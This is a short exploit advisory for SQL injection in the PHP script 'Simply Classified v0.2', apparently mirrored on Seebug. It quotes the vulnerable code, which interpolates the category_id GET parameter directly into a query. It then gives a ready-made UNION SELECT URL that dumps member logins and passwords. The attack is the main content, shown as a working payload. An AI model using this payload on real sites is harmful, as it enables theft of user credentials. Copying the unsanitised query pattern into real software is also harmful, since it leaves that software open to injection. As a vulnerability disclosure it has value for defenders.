============================================================================== _ _ _ _ _ _ / \\ | | | | / \\ | | | | / _ \\ | | | | / _ \\ | |_| | / ___ \\ | |___ | |___ / ___ \\ | _ | IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | \\ | | / _ \\ | |/ / | | _ | || |_ | \\| | | | | | | \' / | |_| | |__ _| | |\\ | | |_| | | . \\ \\____| |_| |_| \\_| \\___/ |_|\\_\\ A Baloch From Iran ============================================================================== Simply Classified v0.2 (category_id) SQL Injection Vulnerability ============================================================================== [»] Script: [ Simply Classified v0.2 ] [»] Language: [ PHP, MySQL ] [»] Website: [ http://www.hotscripts.com/listing/simply_classifieds/ ] [»] Type: [ Free|OS ] [»] Today: [ 26032009 ] [»] Founder: [ G4N0K | mail[.]ganok[sh!t]gmail.com ] ===[ code! ]=== [+] adverts.php, 33-34 {...} <?php $id = $_GET[\'category_id\']; // <== you know! $query = \"SELECT * FROM type WHERE id=$id\" ; // <== did you got it!, damn, check it again. $result = mysql_query($query); $row = mysql_fetch_array($result); ?> {...} ===[ XPL ]=== [»] http://127.0.0.1/classified/adverts.php?category_id=5 UNION ALL SELECT 1,2,concat(login,0x3a,passwd),4,5,6,7,8,9,10 FROM members ===[ LIVE ]=== [»] N/A ===[ Greetz ]=== [»] ALLAH =============================================================================== D-End... ===============================================================================
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京ICP备10040895号
暂无评论